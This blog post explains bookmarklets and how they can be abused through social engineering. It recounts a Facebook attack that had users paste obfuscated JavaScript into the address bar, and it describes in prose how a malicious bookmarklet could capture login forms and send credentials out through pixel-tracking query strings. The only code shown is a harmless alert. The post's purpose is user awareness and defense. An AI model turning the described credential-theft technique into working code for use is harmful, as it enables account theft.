Select Page

I am a big fan of bookmarklets. (A bookmarklet is basically a piece of JavaScript code that is embedded in a web address (URL) and saved as a bookmark or, in Internet Explorer (IE), a favorite.) Bookmarklets work because JavaScript can be run from the address/URL bar of a browser. Go ahead and try it.

In your address bar type:

and press the enter key.

If it didn’t work, you are probably running Firefox, or a browser which does not allow JavaScript: in the address bar.  This was done to prevent a social engineering attack that was being seen on Facebook.  Facebook users were being asked to be a “Fan to see the truth,” and when the user clicked on that they were shown  some obfuscated javascript code and told to copy and paste that code into the address bar of their browser. The code they copied in read the user’s Facebook contacts and sent invitations to all of them.

So, to prevent the type of social engineering attack where users are fooled into copying and pasting JavaScript into the address, Firefox and Opera flat out block the JavaScript in the address bar. Other browsers block the copy/paste and make you type it all in on the assumption that the attack code would be too difficult to type in. Here is an example:

javascript

Nobody would try to type that in!

Of course, if you were really good at social engineering, you might convince or show the victim how to copy and paste the code into the browser’s JavaScript console window.

But if you can social engineer someone to copy and paste malicious code into the address bar, couldn’t you just as easily social engineer them to drag a bookmarklet from a web page to their favorites or bookmark bar and click it?

Below is an example of a simple bookmarklet that has the javascript:alert(“hi”) script in it.  Drag the button below to your bookmark (or favorites) bar and then click the bookmarklet.


You may have seen a warning message when you did that. Newer versions of IE and Opera provide a warning when you drag and drop a bookmarklet onto the favorites bar. Other browsers don’t.

While browsers prevent typing the bookmarklet directly into the browser’s address bar, they don’t do anything to stop you from adding a bookmarklet.

Returning to the Facebook example above, Facebook does not let you add a bookmarklet to a Facebook post. Instead you would create a post with a link to a page with the bookmarklet on it. The post in Facebook would tell the victim to visit a page, the page would hook them with an offer, tell them to drag and drop the bookmarklet onto the bookmark bar, and then tell them to return to Facebook and click on the bookmarklet to win some fabulous prize.

What could a malicious bookmarklet do? If it was well-written, it could do something really useful so that you would keep using it while it worked its evil behind the scenes. (Did you drag the hi bookmarklet to your bookmark bar? Don’t panic!)

For example, it could also monitor the page you are on when you click it and look for forms with password fields. If there was one, then it would wait until the form was submitted, then collect the username and password, and send it to a third party server by appending it as a query string at the end of an image, a technique known as pixel tracking, which is what google analytics does.

What does this all mean to users? Should they not use bookmarkets? As I said at the beginning, I am a fan of bookmarklets, and I don’t want to see them blocked. They can be extremely useful. But users need to be aware of the potential dangers. They should only save bookmarklets from sites they trust. As with any download (be it a bookmarklet or program), be cautious and make sure you are downloading from the actual site and not a phished site (one that looks authentic), or a third-party site that purports to have the same bookmarklet.

I think that IE now has it right. Whenever you drag a bookmarklet to the bookmark/favorites bar you should see a warning.

IE bookmarklet warnng

I would go further, and add another button, for more advanced users, to let you see what the JavaScript code is. But, in the end, it is the user’s responsibility to protect themselves. As Ralph Waldo Emerson said:

“Knowledge comes by eyes always open and working hands;
and there is no knowledge that is not power.”